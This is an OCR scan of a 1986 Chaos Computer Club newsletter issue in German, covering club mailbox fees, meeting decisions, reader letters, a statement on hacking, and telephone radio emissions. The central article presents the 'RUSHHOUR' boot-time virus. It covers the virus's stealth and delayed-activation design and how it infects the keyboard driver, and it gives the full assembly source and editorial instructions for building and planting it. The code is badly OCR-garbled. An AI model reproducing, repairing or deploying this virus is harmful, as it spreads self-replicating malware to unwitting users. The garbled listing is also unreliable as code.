tionsdienstes. (Vortrag)
15:00 TREFF; Regionale Vernetzung von Mailboxen,
Serversystem
(Vortrag und Demo CAC)
16:00 TH EATER: Noch offen
16:30 TREFF: Btx als preiswerter Datenserver. Vor¬
schlag
zum Datenaustausch für Mailboxsysleme.(Idee)
17:00 TREFF: Mailboxen - neue Konzepte (Refc-
rat&Diskussion)
18 ;00 TH EATER: Abschlussansprache, Ausblick
20:00 Schliessung der Räume für Gäste
21:00 Abbau der privaten Technik (geordneter Rück¬
zug)
22:00 Schliessung der Räume (Wachdienst)
^
Wo ist der CCC?
Zur Lage der Chaos Communication Center
fei
Infbrmations
V_ i
DerCCC bietet seinen Mitgliedern zwei Möglichkei¬
ten zur elektronischen Kommunikation an:
4 ^
I. Die INFEX-Mailbox (über DATEX*P)
Für eine Eintragungsgebühr von DM 20,- sowie eine
monatliche Mindestnutzungsgebühr von DM 8,- wird
die Nutzung eines GEONFT-Systems angeboten.
Auf diesem kommerziell genutzten System haben die
Mitglieder den üblichen Komfort eines GEONET-
Systems. Dazu zählen: Mitteilungsversand im GEO-
NET, Telexzugang und Abfrage von Datenbanken
usw. Aus Kostengründen wird die elektronische DA¬
TENSCHLEUDER in Zukunft ..kostenpflichtig“ im
GEONET abzurufen sein. Es ist dem CCC nicht
möglich, weiterhin die hohen Aufwendungen zur In-
formationsgestaltung zu bezahlen. Diese Beweg¬
gründe stehen auch hinter der Entscheidung, wesent¬
liche Telle derClubkommunikaiion aufdie Hambur¬
ger CLlNCH-Box zu verlegen. Im Wesentlichen be¬
stehen jedoch weiterhin die in der DS)6 erwähnten
Lcistungsmerkmale. Es ist immer noch unklar, wann
die INFEX-Box übereinen Telefonponerreicht wer¬
den kann. Wir empfehlen die Teilnahme am INFEX-
System all denen, die für ihren Kommunikation einen
TELEX-Zugang benötigen und die Vorteile eines
Mehrportsystemes zur reibungslosen Kommunika¬
tion brauchen.
Hier kurz die Nutzungskosten der INFEX im Rah¬
men der CCC Nutzung: (Mitgliedschaft im CCC so¬
wie Erteilung einer Einzugsermächtigung)
Eintragung einmalig DM 20,-
Mindestnutzungfürmtl. DM 8,-
je Verbindungsminute DM-,15 !
je Nachricht DM -,07 !
je Telefonalarm DM -,80 !
Telex, Datenbanken und InterMail-Vermittlungen
extra.
! (Diese Preise werden bei negativer Feststellung der
Gemeinnützigkeit des CCCeV noch mit der Mehr¬
wertsteuer belegt.)
Monatlich werden die angefallenen Nutzungskosten
berechnet und eingezogen. Die Kündigungsfrist be¬
trägt 3 Monate.
2. Die CLlNCH-Box (über Telefonport Hamburg
und Datex-P)
Der wesentliche Grund zur Verlagerung der Club¬
kommunikation ist der Standortvorteil der CLINCH-
Box. Sie ist für die Hamburger zum Ortslarif erreich¬
bar und verfügt zudem über einen Datex-P-Zugang.
Die CLINCH-Box unterscheidet sich jedoch von
dem Standard der INFEX-Box. So kann jeweils nur
ein Nutzer(wahlweise Telefon oder Daiex) zugreifen.
Auch fehlt der Komfort in Sachen Datenbanken und
Telexverkehr. Es wird zwar eine Vermittlung angebo¬
ten, die jedoch nur ein Notlösung ist. Wer den Telex-
Zugang benötigt, sollte das komfortablere INFEX-
System wählen.
Auf derCLINCH-Box wird in Zukunft die DATEN¬
SCHLEUDER redaktionell erstellt und (da dieses
System auf Sclbstkostenbasis betrieben wird) auch
kostenfrei zum Abruf angeboten. Es finden sich dort
auch diverse Diskussionsforen der Mitglieder und
anderer Gruppierungen.
Hier kurz die Nutzungskosten der CLINCH-Box;
Mitgliedschaft im CCC (für den Zugang zu den clu¬
binternen Infos)
Für Schüler und Studenien DM 24,- jährlich Für
Vollverdiener DM 60,-jährlich zuzüglich Kosten für
vermittelte Dienstleistungen (Telex,Datenbankabfra¬
gen..)
Die Nutzungsgebühren für das System werden direkt
von der CLINCH Box in Rechnung gestellt. Kündi¬
gungsfrist zum Ende jeden Monats.
Die Redaktion hofft, daß durch Wahl eines preiswer¬
teren Kommunikationsweges mehr Interessenten den
Zugang zu Clubinformationen finden, als dies bisher
möglich.war. Weiterhin werden die Mitglieder, die
einen Zugang zu GEONET benötigen, diesen im
Rahmen der Mitgliedschaft preiswert erhalten. Im
Vordergrund der Auswahl für eines der beiden Sy¬
steme sollte einzig die Frage des Bedarfs stehen. Ge¬
wisse Kommunikationsaufgaben lassen sich nur mit
kommerziellen Systemen bewältigen, andere hinge¬
gen sind preiswerter lösbar. Lassen Sie sich von der
Geschäftsstelle des CCC beraten.
Anfragen zur Teilnahme an den Mailboxsystemen im
Rahmen der CCC- Mitgliedschaft können an die
Clubadresse oder die CLINCH Box mit dem Stich¬
wort „CC-Center“ gerichtet werden.
Fernmündliche Auskünfte:
CCC Geschäftsstelle; 040- 490 37 57
Btx-Redaktion LS23 :040- 48 37 52
Datenauskünfte:
CLINCH Telefon : 040- 632 35 17
CLINCH Datex : 44400090314
Im GEONET : Brett IFXl :Datenschieuder
LS23
Datenschleuder 3
Funktion und Aufbau des Virus
”RUSHHOUR”
(Läuft auf allen IBM<kompatiblen Rechnern, nicht jedoch
auf aüei MS-DOS Rechnern wie Olivetti usw.) Viel über
allgemeine Computerviren will ich hier nicht reden,
sondern nur den Aufbau und die Funktion meines Vi¬
rus erklären. Folgende Forderungen an das Virus-
Programm hatte ich mir gestellt:
1: Es sollte so unauffällig wie möglich arbeiten, d.h.
kein Disketten- oder Plattenzugriff, der dem auf¬
merksamen (!!) Benutzer unlogisch vorkommt,
2 : Absolut alle bisher auf dem Rechner lauffähigen
Programme sollten weiterhin völlig normal rechnen.
3: Der Virus sollte sich kontrolliert vervielfältigen,
d.h. er sollte sich nicht an jedes Programm hängen,
damit seine Existenz nicht durch eine immer mehr be¬
legte Platte/Diskette auffällt.
4: Die Aktivität des Virus sollte zeitverzögert einset-
zen, um die Herkunft des Virus (also: welches Pro¬
gramm hat den Virus cingeschleust) zu verschleiern.
Am Anfang hatte ich mir überlegt, einen Virus zu
schreiben, der sich in jedes lauffähige Programm
(.COM oder .EXE) einbinden kann. Das ließ ich
dann aber aus folgenden Gründen sein:
1 r.COM und .EXE-Files sind unterschiedlich in ihrer
Dateistruktur. Das V-Programm muß zwischen den
Arten unterscheiden können und sich selbst der
Struktur anpassen. Das kostet unter Umständen sehr
viel Speicherplatz für den Virus.
2: Eine Infektion von so vielen Dateien ist durch den
vermehrten Platzbedarf auf dem Speichermedium
auffällig.
Ich entschloss mich daher, den folgenden Weg zu ge¬
hen:
Der Virus setzt sich nur in einem bestimmten Pro¬
gramm fest, das vom Computer unbedingt benötigt
wird, also im Betriebssystem oder in einem Teil da¬
von. Ich wählte den Tastaturtreiber KEYBGR.COM
für diesen Zweck. Der Grund dafür war einfach, daß
die meisten IBM-kompatiblen Rechner nicht mit PC¬
DOS 2.0, sondern mit dem (fast!) identischen MS-
DOS 2.11 arbeiten. Dieses MS-DOS, bzw. dessen Ta¬
statur-Treiber, war für den Olivetti M24 vorgesehen,
der im Vergleich zum IBM eine komplexere Tastatur
besitzt. Läuft der Tastaturtreiber auf einem IBM, so
ist das Vergeudung; der eigentlich benötigte Tastatur¬
treiber umfaßt nur 1543 Bytes, während der benutzte
6549 Bytes lang ist. Ich bängte also an den IBM-
Trciber einfach mein Virus-Programm und der Trei¬
ber war schon etwa 2000 Bytes lang — dann wurde er
noch auf die ''benötigten”, d.h. unauffälligen 6549
Bytes erweitert (hier könnte z.B. ein 4500 Zeichen
langer Text über die Gefährlichkeit der Computervi¬
ren abgelegt werden) — und fertig ist der Virus.
Der Virus sucht, wenn er im System ist, bei jedem
vom Benutzer erzeugten Piatten/Diskettenzugriff im
aktuellen Directory nach dem Tastaturtreiber. Die
Unterscheidung in/iziert/sauber wird nach der Zeit
der letzten Änderung des Files KEYBGR.COM ge¬
troffen. Das MS- DOS File hat eine gespeicherte Zeit
von 9:00:03 (angezeigt im DIR wird 9:00 ) während
das infizierte die Dateizeit von 9:00:00 hat. Somit ist
eine Unterscheidung allein aus dem Directory-Ein¬
trag ohne langwierigen weiteren Disketlenzugriff
möglich.
Alles weiteren wichtigen Informationen geben die
Kommentare im Quellcode.
Ergänzungen der Redaktion zum Virusprograrnm:
Der Virus muss nun noch assembliert, gelinkt und
dann in ein COM- File gewandelt werden. Mittels
eines geeigneten Monitors werden nacheinander der
Virus und der Tastaturtreiber geladen und mit 6549
Bytes als KEYBGR.COM zuriickgeschrieben. Gege¬
benenfalls muss der durch den Treiber übcrschricbe-
ne Virusanfang restauriert werden, bevor das infizier¬
te File auf Disk geschrieben wird. Das sollte für einen
geübten Assemblerprogrammierer kein Problem sein.
Der vorliegende Virus zeichnet sich übrigens durch
einige Besonderheiten aus, die ihn als besonders
geeignet für die erste vollständige Veröffentlichung
eines virussourcecodes erscheinen lassen: Er hat alle
Eigenschaften eines Virus, ohne zerstörend zu wir¬
ken, wenngleich auch unbedarfte Anwender, die den
Virus einfangen, an Hardwaredefekte denken mögen.
Der Virus arbeitet im Verborgenen und wird nur dann
aktiv, wenn ohnehin durch den Anwenderauf Disket¬
te/Platte zugegriffen wird, er fällt also nicht so leicht
auf. Drittens kann man den Virus kontrollieren, weil
er ja nur das Programm KEYBGR.COM befällt, und
das auch nur, wenn dieses Programm mit der Uhrzeit
09.00.03 im Directory steht. Dieser Umstand führte in
der Redaktion zu argen Schwierigkeiten, denn für
den als Versuchskaninchen ausgesuchten Rechner
gab es zunächst kein KEYBGR.COM, welches den
Ansprüchen des Virus genügt. Kurzum, es ist ein Vi¬
rus, der voll funktionsfähig ist, aber wohl kaum grös¬
sere Verbreitung finden dürfte.
Die Virusaktivität besteht darin, daß bei jedem Ta¬
stendruck und ßilschirmausgabe eines Zeichens ein
kurzes Rauschen (’Tchebehr) zu hören ist und der
Benutzer an einen Hardwarefebler denken könnte.
NAME VIRUS
ABSO SC01ENT AT 0
ORC 4*10K
VIOEOINT OW 2 OOP (7) ; VIDEO INTERRUPT VECTOR
ORG 4*21K
DOSIWT OW 2 DUP (?» ; OOS
ORC 4*24H
ERRORIKT OM 2 OOP <7» ; ERROR ---
A0SO ENOS
CODE SEGMENT
ASSUME CSiCODE, DSiCODE. ESiCOOE
ORC OSCH
rCB LABEL BYTE
DRIVE DB 7
PSPEC DB 11 DUP (' *) ; Fllenaine
ORG SCH
FS12E DH 2 DUP (?»
PDATE DM ? ; Datun des letzten SchEftibKRA
rriME DH ? f Zelt
ORC 8OH
DTA DV 126 DUP (?) : Disic 7r»naf£rätkii»a
ORC 071CH ; Ende des
XOR AX,AX
MOV eS,AX ; ES telgt auf ABÄöiwww''
ASSUME ES:ABSO
PÜSH CS
POP OS
MOV AX.VIOEOIMT SpeFöhRre air,' - , e* a-
MOV BX,V1DE0INT»2
MOV VIDEOVECTOR.AX
MOV VlOeoVECTUH+Z^ax
MOV AX.OOSIKT
MOV ax,oosiMT*2 ^.4;
MOV OOSVECTOR.AX ' .'SM:
MOV DOSVECTOR*2,BX
CLI
MOV DOSINT.OFFSET VIRUS ; Neuer D
VIRUS
MOV DOSINT+2.CS
MOV VIDEOINT,OrrSET DISEASE ; VH*
DISEASE
MOV V10E01NT*2,CS
STI
MOV AH,0
INT IAH ; Lese TlmeOfDay (700)
MOV TIMEO,OX
LEA DX.VIRUSENDE
INT 27H ; Prooranw Deenden, aber
; resident bleiben.
VIDEOVECTOR DH 2 DUP (?)
DOSVECTOR OH 2 DÜP (?)
ERRORVECTOR DM 2 00P(?)
TIMEO DH ?
«er Tfi;
auf
■A..,
; VIRUS Hauptprogranntel1 :
; 1. Systenaufruf AH*4BH 7
; Nein : —' 2.
; Schon infiziert 2
; Ja : —' 3.
t
: 2. Sprung Ins normale 005
/
Rhdval ob 'bfhg'
ACTIVE OB 0 ; Nicht aktiv.
PRCSCT DB 0 ? Allererster Virus rieht aktiv !
DB 'A;'
FNAME PB 'AEYBCR CCM'
DB 0
VIRUS PRDC FAR
ASSUME CSrCODE. DS:N0THIN6. EStNDTHlNG
PUSH AX
PÜSH CX
PUSH DX
MOV AH,0 ; Prvefe, ob mindestens 15 Min.
INT IAH ; seit Initialisierung vergangen
SUB DX,TIMEO 2 sind.
CMP OX,16364 ; (U384 Ticks des Zeitgebers -15 Hin.
JL S3
MOV ACTIVE,! ; Falls ja, aktiviere Virus.
S3; POP DX
POP CX
POP AX
; Dlskettenzugrlf t
i aufgrund des
CMP AX,4B00H ; OOS Kocmiandos
JE $1 ; "Prograjiini laden und ausfuehren* ?
EXITl: JMP DOSVECTOR ,- Nein : —’ Normal weiter
Sl: PUSH ES ; CS:BX —' Parameterblock
PUSH BX ; OSiDX —' Dateiname
PUSH OS ; Sichere Register, die noch
; gebraucht
PUSH DX : veeden fuer INT 21H (AH-4BH)
MOV 01.DX
MOV DRIVE,0 ; Setzen des Laufwerkes des
MOV AL,DS:DI>1 ; auszufuehrenden ProQiaitanes
CMP Al,':'
JHE SS
MOV Al,DS:DI
SUB AL, 'A'-l
MOV DRIVE,Al
SS: CLD
PUSK CS
POP DS
XOR AX,AX
MOV ES,AX
ASSUME DS;COD£, ESMBSO
MOV AX,ERHORIwr ; Icnorleren aller Dlsketten-
I -fahler“
MOV BX,ERR0R1NT*2 j durch olgonr! Kehlnrrout 1 no
MOV ERRORVECTOR. AX
MOV ERRORVECTOR*!,BX
MOV ERRORINT.OFFSET ERROR
MOV ERR0RINT*2,CS
PUSH CS
POP ES
ASSUME ESiCODE
LEA DX.DTA ; Disk Transfer Area anwaehlen
MOV AH,IAH
INT 21H
MOV BX,11 : Uebertragen des Dateinamens
$2; MOV AL.FNAME-IBX ; ln den FlleControlBlock
MOV rSPEC-lBX,AL
DEC BX
JN2 $2
LEA DX,FC3 ! oefCne Datei ( zum Schreiben )
MOV AH,OFH
INT 21H
CMP AL,Q
JNE EXITO ; Datei existiert nicht —' Ende
MOV AX.FTIME ,• Datei schon Infiziert 7
CMP AX,40OOH
JE EXITO ; Ja —' Ende
MOV PRESET,! ; (Alle Kopl
MOV SI.IOOH ; Schreibe de
$4: LEA DI,DTA
MOV CX,128
REP MOVSB
ISA DX,FCB
MOV AH,15H
INT 21H
CMP SI,OFFSET VIRUSENDE
JL 84
MOV FSIZE,OFFSET VIRUSENDE - lOOH
MOV PSIZC*2,0 ; Korrekte Dateigroesse setzen
MOV FaATE,0AA3H ; Korrektes Datum (03.05.06)
MOV FTIH£,4aOOH ; Korrekte Zeit ( 9:00:00)
; setzen
lEA DX,rCB ; Datei schllessen
MOV AH.ICH
•INT ZIH
XOR A (,AX
MC« * 1,AX
E5:AB50
H9ir AX,ERRORVECTOR ( Rueckaetzen des Fehler-
7 ftPtarrupts
%K,SRR0RVECT0R*2
h0y.^SiRORINT,AX
HQV.:eiliipRIMTt2,BX
8 POP DX ; ftueeXhelen der gesicherten
ter
PO? nz'
£S:K0TKINC
(||i;i<fiHemale Fun)ctlflnsausfuflhrung
3 ex
3> la
Wi»" ES
.''ASSUMB DS:H_.„,
MOV AX.
JMP
?3KEt^"|lnfach alle Fehler
■ EMDP
XiSi'JSSEASE PROC FAR
HÜ-^ASSUME DSiNOTHINC, ESffipTHINC
PUSH AX “ii.,
PUSH CX t Dlese,:{tirQlüiCmr:IVerden zerstoert
TEST PRESET,
JZ EXrT2
TEST ACn^l-
■ , %JÖ*::-.Afe:iMrP?|Mi'öt'iprecher .ainschalten
( Bit 0 Ä- 0 >
» schieiiüliadMÄr-,«':
NOfSE! i ,
MOV AL, RHDVAL ;
XOR AL,(Ufi«>AL+3 f
SHL ALrX'/,-:,^f’«^i«S^^*@l^SCHEN
5HL AL,r ft
RCL »aSH StR RNDVAL»X P :
RCL WC^;;:;jipfR RKOVAL*>^3j f :
MOV l AusgÄ^ftftätnes bgü^falgen
AND AKtiS^^aits des ri»E)tg«ltoppel.LBn
IM AL, fiIÄ;?*i';'Schlebere<jiätte'i*
AND AL.ORJiJifJv—* UuCjy««eiier rauscht ...
OR AL.AH
OUT 61H,At
LOOP NOI5E '■
AND AL,0rCH
OR AL, 1
OUT 61H.AL
EX1T2: POP CX
POP \X
JMP VIDEOVECTOR
; springen .
DISEASE ENDP
DB 'Dieses Prograrna Ist ein sogenanntes VIRUS - Pro-'
DB 'graan. Es hat, einmal aktiviert, die Kontrolle ueber'
DB 'alle S/stemelnhelten und sogar ueber die vom'
DB 'Benutzer eingelegten Spelcherungsmedlen. Es kopiert'
DB 'sich salbstsCaendlg in noch nicht Infizierte Be'
DB .'trlebssysteme und verbreitet sich so unkontrolliert.'
DB 'Dae der Virus ln diesem Fall keine Benutzerprogranme'
DB 'zerstoert oder Speichemedien loescht, ist nur ein'
DB 'philantroplscher Zug des Authors.'
ORG 1C2AH
VIRUSENDE LABEL BYTE
CODE ENDS
END
vfrvcil.äs fOxI2711861810
ttAldUlplf'flolier ausschalten
in die normale VIDEO - Rout Ine
DatensclileuderS
Datenschleuder 4
Liebe Leute vom CCC,
so Herbst/Endc letzten Jahres hatte ich bei euch ]
Hackerbibel Teil I zu 33.33 und 64 Kleber „Achtung
Abhörgefahr“ A4 bestellt. Daraufhin tat sich ne Wei¬
le gar nix und ich hatte die Bestellung eigentlich auch
schon abgeschrieben, bis ihr plötzlich am 4.4.86 den
damals beigefügten Scheck eingelöst habt. Seitdem
ist aberauch nix mehr passiert. Es wäre ganz nett von
euch, wenn ihr schon den Scheck einlöst und mein
armes Konto überzieht, daß ihr mir auch was schickt,
denn jetzt hätte ich auch echt wieder Lust auf das
Buch. Wenn ihr die Kleber nicht mehr findet, packt
halt ne andere nette Sache ’rein. Ok??
PS: Wißt ihr, was mich an euch nervt? Ihr seid so
schweine-elilär. Muß doch echt nicht sein. Ist doch
nichts dabei, aus ein paar ICs witzige Sachen zu
bauen und was Feines, Subtiles mit zu machen. Da
braucht man doch keine Avantgarde-Crew a la CCC.
Sowas ist doch Scheiße und läuft unseren eigenen
Zielen'zuwider] Auch der Personenkult a la Wau ist
doch zum Kotzen! Lieber 1000 subtile DFÜ-Crews In
der Nacht, als noch eine Elite mehr.
Volker Ernst
Die CCC-Fachgruppe Weltregierung meint dazu:
Zum einen: Wir sind von Zeit zu Zeit schlicht über¬
forden, was das Erledigen von Bestellungen angeht.
Einfach, weil es an Zeit und Leuten mangelt, die ver¬
antwortlich mitmachen. Im allgemeinen kriegen wir
das aber zusammen mit den Bestellern in den Griff,
ohne daß der Gerichtsvollzieher erscheinen muß.
Don’t panic. Es läuft nicht ganz so glatt wie bei Quel¬
le, wofür wir um Nachsicht bitten und Besserung
nicht versprechen können. In bestimmten Dingen ist
der CCC aber trotzdem, so hoffen wir, die bessere
Quelle.
Lieber Volker, Du solltest uns wirklich mal besuchen
kommen (z.B. zum Congress), wenn Du den Eindruck
hast, daß wir ein elitärer Haufen sind. Heiterkeit wird
in Dein Herz einkehren, wenn Du die Realität siehst.
Der CCC Hamburg ähnelt weniger einer Elite, die
sich ja auch durch straffes, diszipliniertes Funktio¬
nieren hervortun müßte, als vielmehr einem rechner¬
gestützten Flohzirkus. Dieser Flohzirkus zeigt rapide
Auflösungserscheinungen, wenn mal wieder Brief¬
couverts zugeklebt werden müßten oder so, was u.a.
zu den elastischen Lieferzeiten fuhrt. Und er erzeugt
andererseits als eine Art Gruppendynamo auch jene
wunderliche Art von (technischen und politischen)
Geistesblitzen, die in den letzten Jahren überall dort
aufleuchten, wo sich Leute trickreich, spielerisch und
kritisch mit elektronischer Datenverärgerung und
Kommunikation auscinandersetzen: Bicpiloten wie
Du und ich. Das, was wir alle machen, könnte man
”Arbyte” nennen. Rumdüsen im Informationszeital¬
ter. Eine Bordzeitung hältst Du gerade in der Hand.
Mit welchen Absichten wir dieses kleine aber feine
Käseblättchen hersteilen, und daß dies nicht zu unse¬
rer Privatbeölung geschieht, ist in dem Artikel «'The¬
ma Hacken“ ausführlicher beschrieben: siehe dort.
Im übrigen: Willkommen an Bord. Captain Chaos
begrüßt sie und wünscht einen angenehmen Flug
nach Digilalien. Bitte abzuschnallen und das Rau¬
chen fortzusetzen, wir booten in Kürze.
Und da wir grade bei Piloten sind, noch ein Wort zum
vermeintlichen Personenkult. Der Vorwurf, daß
einem etwa Wau (bekannt aus Funk und Fernsehen)
dauernd aus der Zeitung cntgegcnlacht, trifft nicht
Wau, sondern die Medien. Journalisten arbeiten mit
Schubladisierungen, und seit dem Btx-Coup haben
sie Wau in der Lade mit der Aufschrift „Computer &
Aberwitz“. Dort sitzt er nun, bzw. jener Teil seiner
Seele, der in der Medienlandschaft „Image“ heißt.
Und wenn irgendwo wieder ein armes schwaches
Elektronengehim in Ohnmacht gefallen ist, zieheri
die Journalisten die Lade auf, zappklapp, und bei
Wau beginnt das Telefon zu rauchen, so einfach ist
das. Aus diesem Grund lassen sich beispielsweise
Stammesangehörige der Massai (Ostafrika) nicht fo¬
tografieren (nicht wegen Wau, sondern wegen dem
gefangenen Image). Dieser Effekt potenziert sich
dann nach dem Motto „Leute versammeln sich dort,
wo sich schon Leute versammelt haben“, d.h. durch
die Berichterstattung kriegen nicht nur immer mehr
Leser, sondern natürlich auch immer mehrToumali-
sten Wau in die Lade. Grade für ein so inhomogenes
Sortiment von Zeitgenossen wie es Computerfreaks
darstellen, ist es doch von entscheidender Wichtig¬
keit, über Sprecher zu verfügen, die eine weit gestreu¬
te Aufmerksamkeit finden und das Kunststück zuwe¬
ge bringen, die gemeinsame Hackerphilosophie ak¬
tuell auf den Punkt zu bringen und gleichzeitig auf
eine auch für Nichifreaks verständliche Weise EDV-
kriiische Rauchsignale aus dem Maschinenland ab¬
zugeben. Das kann nicht jeder. Wer sich in der Me¬
dienpräsenz der Computersubkultur ein demokrati¬
sches Modell, etwa nach dem grünen Roiaiionsprin-
zip, wünscht, dem muß man zu bedenken geben, daß
ein soziokybcrnctischcs Infotop (langsam nochmal
lesen) wie der CCC sich nicht wie ein Gesangsverein
vor einer Fernsehkamera zusammenschieben läßt.
Und nicht an Dich gerichtet, Volker, aber an jene, die
vielleicht ein bißchen eifersüchtig auf das Wau-Ima¬
ge sind: Wer meint, daß es der reine Eitelkeitsgenuß
ist, wenn man sich alle acht Wochen im SPIEGEL
bewundern kann, der hat sich kräftig in den Finger
geschnitten. Im öffentlichen Interesse zu stehen, zu¬
mal wenn es dabei bisweilen um Aktionen am Rande
der Legalität geht, erweckt u.a, auch rasch die Auf¬
merksamkeit behördlicher Stellen, die einem fortan
von Amts wegen ganz empfindlich im Privatleben
henimrüsseln.
Für den Großteil der Bevölkerung waren Hacken und
Datenakrobatik vor noch nicht allzu langer Zeit ge¬
nauso obskure Angelegenheiten wie Flechtenkunde
oder Ägyptologie. Von daher betrachtet war die Ha-
Spa/Btx-Geschichte für uns alle sowas wie die spek ¬
takuläre Öffnung der Grabkammer des Tutencha-
mun. Statt uns in Kleingeisterei zu zernörgeln, sollten
wir die Goldmaske „Image“ pflegen, der es mit zu
verdanken ist, daß wir unsere Grabungen in den do¬
tierten Siliziumplättchen fortführen können, ohne
umgehend im Verließ zu landen.
Datenschleuder6
Nobody is Plusquamperfekt. Und grade wer sich ein¬
gehender mit Medien und Kommunikationstechno¬
logie befaßt, wird gut wissen, daß zwischen der Per¬
son Wau („Herr Wau aus Holland bitte zum Informa¬
tionsschalter“) und dem Image Wau ein wichtiger
und vor allem wirklichkeitsmächtiger Unterschied
besteht. In eine Bierkiste passen etwa acht SpaceS-
huttles, und das World Trade Center ist zirka so hoch
wie eine Packung Butterkeks: Das sind die Dimen¬
sionen der Wirklichkeit, wie sie beispielsweise das
Fernsehen zeigt.
Im übrigen sind wir dankbar für jeden, der uns bei
der Ausübung unserer avantgardistischen und elitä¬
ren Beschäftigungen, nämlich bei den verlustreichen
Gefechten im Papierkrieg, beim Kaffeekochen, Sor¬
tieren, Müllruntcrbringcn, Interviewsgcben und I-
Million-kleine-Dinge-erledigen tatkräftig unterstützt.
Lieber 1000 subtile Crews, die beim Eintüten helfen,
als noch eine eingegangene Zeitung mehr. Und nun
das Weiter.
Ls blofeld
Aie
AaxevGx^s'uSep
Mitgliederversammlung
des CCC e.V. vom B. II. 1986 ■■■«i
Die 1. ausserordentliche Mitgliederversammlung be¬
schloss am 8.11.86 zwei Punkte, die sich wesentlich
für unsere Mitglieder auswirken werden:
Zum ersten, die Änderung der Vereinssatzung. Durch
die Ablehnung der Gemeinnützigkeit aufgrund der
Beurteilung, daß „Hacken“ keinen gemeinnütziger
Zweck im Sinne der Abgabenordnung darstelle, wur¬
de eine Umformulierung der Satzung nötig.
Es wurde folgende Satzungsänderung beschlossen
und zur Eintragung in das Vereinsregister einge¬
reicht:
Der Paragraph 2, Absatz 1, Punkt 7, bisheriger Wort¬
laut 'Hacken’, wird gestrichen und durch die Formu¬
lierung 'Förderung des schöpferisch-kritischen Um¬
gangs mit Technologie’ ersetzt.
Zum Zweiten der weitere Betrieb des Chaos Commu-
nication Center:
Der Vorstand des Clubs erläuterte die Situation des
Chaos Communication Center auf dem INFEX-Sy-
stem. Die dort gemieteten Kapazitäten werden der¬
zeit nur zu 30 Prozent genutzt. Der Zulauf ist erheb¬
lich geringer als erwartet. Die Mitgliederversamm¬
lung beschloss, die Clubarbeit auf die CLlNCH-Box
zu verlagern, außerdem aber die Teilnahmemöglich¬
kelten auf dem Infex-System (soweit dies finanzier¬
bar ist) für interessierte Mitglieder weiterhin anzubie¬
ten. Zur praktischen Handhabung dieser Änderung
siche Artikel „Wo ist der CCC?“
LS23
THEMA HACKEN
Ein Statement
Der Chaos Computer Club gilt in der Öffentlichkeit
als eine Art Robin Data, vergleichbar mit Greenpea¬
ce, Robin Wood und anderen. Spektakuläre
Aktionen, wie beispielsweise der Btx-Coup, demon¬
strative Manipulationen mit Geldautomaten oder die
jetzt anstehende Diskussion über Computer-Viren,
werden als nachvollziehbare Demonstrationen über
Hintergründe im Umgang mit der Technik verstan¬
den. DerCCChat damit eineaufkläreri-sche Rolle für
den bewußten Umgang mit Datenmaschinen über¬
nommen. So schreibt Walter Volpert in seinem Buch
„Zauberlehrlinge - die gefährliche Liebe zum Com¬
puter“, die „neuen Hacker“ seien interessant, weil sie
als Computer-Enthusiasten den Mythos der unan¬
greifbaren Maschine zerstören können. Durch dieses
Image in der Öffentlichkeit, hat sich der CCC in den
letzten Jahren einen Freiraum erkämpft, in dem unter
gewissen Voraussetzungen Hacks möglich sind, die
Einzelpersonen in arge Schwierigkeiten bringen wür¬
den.
Zunehmend versuchen nun Einzelne im CCC-Fahr-
wasser mitzuschwimmen, indem sie ihre privaten Ak¬
tionen ohne Rücksprache mit dem Club als CCC-Ak-
tion darstellen. Dies hat schon in der Vergangenheit
eine Reihe von Problemen aufgeworfen. Inzwischen
wird für fast jede Aktion in der Bundesrepublik eine
Stellungnahme vom CCC erwartet, wobei der CCC
über die Hintergründe der bekanntgewordenen Ak¬
tionen oftmals nicht informiert wurde. Gleichzeitig
besteht wegen der gesellschaftlichen Aufgabe des
CCC die Notwendigkeit, einer Kriminalisierung von
Hackern entgegenzuwirken. Vor diesem Hintergrund
kann der CCC ohne Rücksprache nur unter erschwer¬
ten Bedingungen Unterstützung leisten. Rücksprache
heißt in dem Zusammenhang, daß rechtliche Konse¬
quenzen angesprochen werden sollten, um im Rah¬
men juristischer und journalistischer Möglichkeiten
eine Kriminalisierung zu verhindern. Dazu sollte sich
eine Gruppe zusammenfinden, die Kriterien entwic¬
kelt, die als Orieniierungshilfen gellen können. Diese
Gruppe hätte unter anderem die Aufgabe, sich in die
geltende Gesetzgebung einzuarbeiten, um kompetent
argumentieren zu können. Darüber hinaus ist zu fra¬
gen, ob sich der CCC weiterhin als „Deutschlands
Hackerzentrale“ mit Personenkult entwickeln kann
— und vor allem — was die einzelnen Mitglieder tun
können, um diese allgemein kritisierte Situation zu
überwinden.
jwi
Datenschleuder?
Strahlengefahr aus dem Telefon?
In^der vergangenen Zeit häuften sich in der Redak¬
tion Anfragen von Personen, die ihren Fernsprecher
zufällig im Radio empfangen können.
Es sind nicht die typischen Filmszenen, in denen der
Agent die Wanze durch Drehen am Radio entdeckt.
Hier scheint es sich um ein serienmäßiges Merkmal
der Postgeräte zu handeln. Wiederholt konnten Fern¬
sprecher mit eingebautem Gebührenzähler auf der
Freuenz von 405 Khz (zwischen Mittel- und Langer-
welle) im Radio empfangen werden. Es scheint, als
ob die Gebührenzähler wie Sender wirken und, be¬
dingt durch Toleranzen der verwendeten Bauteile,
mehr oder weniger weit zu empfangen sind. Manch¬
mal muß man das Telefon auf das Radio stellen, in
anderen fällen empfängt man es im Auto-Radio.
Bisher ist der Fernsprecher TAP 791*Gebanzl mehr¬
fach aufgcfallcn. Leser, die im Besitz eines Empfän¬
gers sowie eines Fernsprechers mit Gebührenzähler
(vielleicht auch ohne) sind, sollten der Redaktion ihre
Erfahrungen milteilen. Auf dem Congress wird dieses
Thema im Rahmen eines Workshops über kompro¬
mittierende Abstrahlung behandelt.
LS23
Staatliches Wanzenmonopol
eingerichtet
P(^ weist auf AomeldetermiD aichtgeaehmigter
Sendeaalageo h/o.
Das seit dem 5. Juli 86 geltende „Gesetz zur Verhin¬
derung des Mißbrauchs von Sendeanlagen“ hat, laut
Aussage der Post, den verstärkten Schutz der Intim-
und Geheimsphärc der Bürger sowie des Femmeldc-
verkehrszum Ziel.
Dieses Gesetz macht bereits den Erwerb, den Besitz
und das Überlassen einer Sendefunkanlage (Sender
oderSender/Empßnger) von einer femmelderechtli-
chen Genehmigung abhängig. Das Betreiben nicht-
genehmigter Sendeanlagen, die im Einzelhandel an-
geboten werden, war zwar auch vordem 5. Juli verbo¬
ten, der bloße Besitz hingegen gestattet. Die sich noch
ira Besitz von Personen und Firmen befindlichen
nicht zugelassenen Geräte, müssen bis spätestens 5.
Januar den Funkstörmeßstellen der Fernmeldeämter
gemeldet werden.
Auch nach der Bestätigung (unbedingt abfordem!)
der Besitzanzeige durch die Post dürfen die Geräte
